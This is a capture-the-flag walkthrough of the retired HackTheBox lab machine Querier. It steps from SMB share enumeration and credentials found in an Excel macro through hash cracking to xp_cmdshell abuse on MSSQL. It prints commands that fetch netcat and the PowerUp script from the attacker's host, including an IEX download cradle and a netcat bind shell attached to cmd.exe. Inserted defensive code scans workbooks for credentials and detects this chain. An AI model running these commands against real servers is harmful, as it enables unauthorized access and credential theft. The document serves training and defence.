Walkthrough of the Hackthebox pentest lab machine Querier

Hello, Habr! In this article you will learn about a method of attacking a remote server using MsSQL features, getting a shell to gain a foothold on the system, and an example of exploiting a poorly configured group policy in Windows.



Below we describe our experience of completing the Querier lab machine on the hackthebox portal.



For those unfamiliar with hackthebox: it is a portal where you can practise your pentesting skills on CTF challenges and lab machines.



Disclaimer
The rules of the service say: "Don't share how you hacked each machine with other members. This includes the invite code generation and all challenges." But since this machine is no longer active and is stored in the Retired Machines section, only VIP members can access it.







Information gathering

Let's begin reconnaissance with an nmap port scan.

nmap -sC -Pn -A 10.10.10.125









The ports found by the scan:



Enumerating 139/445/tcp (SMB)

We use the smbclient utility to list the shares on the SMB server.

smbclient -L //10.10.10.125
      





After going through all the shares, we find the file “Currency Volume Report.xlsm” in the Reports share.







Opened in standard Microsoft Excel, the file looks completely empty at first glance.

We analyse the file with the binwalk utility, which shows the files embedded in the xlsm document (an xlsm is a ZIP container).







binwalk's output shows some interesting files contained in the xlsm.

Using the -e flag, we unpack them.

binwalk -e Currency\ Volume\ Report.xlsm









Now we use the strings utility to print the printable strings of each file. Going through the files, we find interesting data in vbaProject.bin: it looks like we have found credentials for the mssql server.
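The same inspection can be done without binwalk or Excel, because an xlsm is a ZIP archive and any macro code lives in xl/vbaProject.bin. The following is an added example (our code, not from the original article): it builds a constructed xlsm-shaped archive in memory whose vbaProject.bin stand-in carries a made-up connection string, then reports whether the workbook has a macro project and which printable strings look like credentials, the check a reviewer of shared documents would want before such a file reaches a public share. The file names, the "EXAMPLE-SQL" host and the svc_report/ExamplePass123 values are all constructed.

```python
import io
import re
import zipfile

# Constructed stand-in for xl/vbaProject.bin. A real one is an OLE compound file whose
# VBA source is compressed, but literal strings such as connection details frequently
# survive in the clear, which is what `strings` picked up on the lab file.
FAKE_VBA_BIN = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(24)  # OLE magic + padding (constructed)
    + b"Sub Connect()\x00\x00"
    + b'conn.Open "Provider=SQLOLEDB;Data Source=EXAMPLE-SQL;User ID=svc_report;Password=ExamplePass123"\x00'
    + b"\x01\x02\x03End Sub\x00"
)

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as `strings`: runs of printable ASCII
CRED_HINT = re.compile(r"password|pwd=|user id|uid=|data source|connectionstring", re.I)


def build_sample_xlsm() -> bytes:
    """Build a minimal xlsm-shaped ZIP in memory (constructed sample, not the lab file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")  # the 'empty' sheet Excel shows
        z.writestr("xl/vbaProject.bin", FAKE_VBA_BIN)
    return buf.getvalue()


def extract_strings(blob: bytes):
    """Return printable ASCII runs of 4+ characters, like `strings` does."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def inspect_xlsm(data: bytes) -> dict:
    """Report whether the workbook carries a VBA project and list credential-looking strings."""
    report = {"has_macro": False, "macro_members": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower().endswith("vbaproject.bin"):
                report["has_macro"] = True
                report["macro_members"].append(name)
                report["suspicious"].extend(
                    s for s in extract_strings(z.read(name)) if CRED_HINT.search(s)
                )
    return report


if __name__ == "__main__":
    r = inspect_xlsm(build_sample_xlsm())
    print("macro present:", r["has_macro"], r["macro_members"])
    for s in r["suspicious"]:
        print("credential-looking string:", s)
```

Run against a real workbook, replace build_sample_xlsm() with the file's bytes; a hit in vbaProject.bin means the credentials should be rotated and moved out of the document, since anyone with read access to the share already has them.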







To summarize what we have found so far:





So let's try to connect to the server using the mssqlclient.py script from impacket.



 python mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
      
      





We get access to MsSQL.







Enumerating MsSQL

We enumerate the information useful to us using the commands from the article.

After executing the queries, we capture the NetNTLMv2 challenge-response hash of the user mssql-svc.







To recover the plaintext password, crack the hash with whichever tool you prefer:

  1.  john --format=netntlmv2 hash.txt

  2.  hashcat -m 5600 -a 3 hash.txt
          
          





We obtain the password of mssql-svc.



We connect to SQL with the new credentials.



 python mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-auth
      
      





The rights of this user allow us to execute xp_cmdshell.

About xp_cmdshell
MsSQL ships with a large set of extended stored procedures. The most interesting of them is xp_cmdshell: it runs commands in the operating system's shell, so database access turns into command execution on the host.



Getting a shell with netcat

We will get a shell through netcat; for that we first need to upload it to the target server.

We go to the directory on our machine where netcat is located and start a web server:

python -m SimpleHTTPServer





In the mssql shell, download netcat (nc.exe) onto the remote server by running the following PowerShell command through xp_cmdshell, specifying the path to save it to.

xp_cmdshell "powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" -OutFile "C:\Users\mssql-svc\Desktop\nc.exe" "





We start netcat on the target, listening on port 4444 with cmd.exe attached to the connection.



 xp_cmdshell "powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe"
      
      





On our side we connect with netcat to the IP and port of the target server and get the shell.



 nc 10.10.10.125 4444
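From a detection point of view the chain above is loud: the SQL Server process spawns cmd.exe, a shell runs a PowerShell download cradle, and netcat is launched with a shell bound to the socket. The following added example (our code, not from the article) encodes those three observations as rules over process-creation telemetry and runs them over constructed sample events that mirror the commands shown above plus two benign events. The sqlservr.exe path and the benign command lines are assumptions; the field names follow Sysmon event 1 but the records are made up here.

```python
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR style fields)."""
    parent_image: str
    image: str
    command_line: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell download cradles: the walkthrough uses Invoke-WebRequest and DownloadString.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer)", re.I
)
# netcat started with a shell attached to the socket (nc -e cmd.exe), whatever path it was dropped under.
NETCAT_SHELL = re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+(cmd|powershell)", re.I)


def basename(path: str) -> str:
    """Case-insensitive file name from a Windows or POSIX style path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def detect(events):
    """Return (rule name, event) pairs; one event can trip several rules."""
    findings = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent == "sqlservr.exe" and child in SHELLS:
            findings.append(("xp_cmdshell: sqlservr.exe spawned a shell", ev))
        if child in SHELLS and DOWNLOAD_CRADLE.search(ev.command_line):
            findings.append(("download cradle from a shell", ev))
        if NETCAT_SHELL.search(ev.command_line):
            findings.append(("netcat with a shell bound to the socket", ev))
    return findings


# Constructed sample telemetry mirroring the walkthrough's chain, followed by two benign events.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"  # assumed path
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(SQLSERVR, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" -OutFile "C:\Users\mssql-svc\Desktop\nc.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS_EXE,
              r'powershell.exe Invoke-WebRequest "http://10.10.xx:8000/nc.exe" -OutFile "C:\Users\mssql-svc\Desktop\nc.exe"'),
    ProcEvent(SQLSERVR, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c powershell C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe"),
    ProcEvent(PS_EXE, r"C:\Users\mssql-svc\Desktop\nc.exe",
              r"C:/Users/mssql-svc/Desktop/nc.exe -l -p 4444 -e cmd.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", PS_EXE, r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe", SQLSERVR, '"%s" -sSQLEXPRESS' % SQLSERVR),
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line}")
```

The first rule is the one worth keeping even where the others are noisy: sqlservr.exe has no business spawning a shell on most servers, and xp_cmdshell is disabled by default, so the configuration change that enables it (visible in sys.configurations) is itself a finding.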
      
      





To escalate privileges, we run the PowerUp script from PowerShellMafia.



 powershell.exe IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.xx:8000/PowerUp.ps1\"); Invoke-AllChecks
      
      









The script's output gives us the administrator credentials.



We access the SMB shares with the new credentials and their permissions.











Take the root.txt flag. Victory!


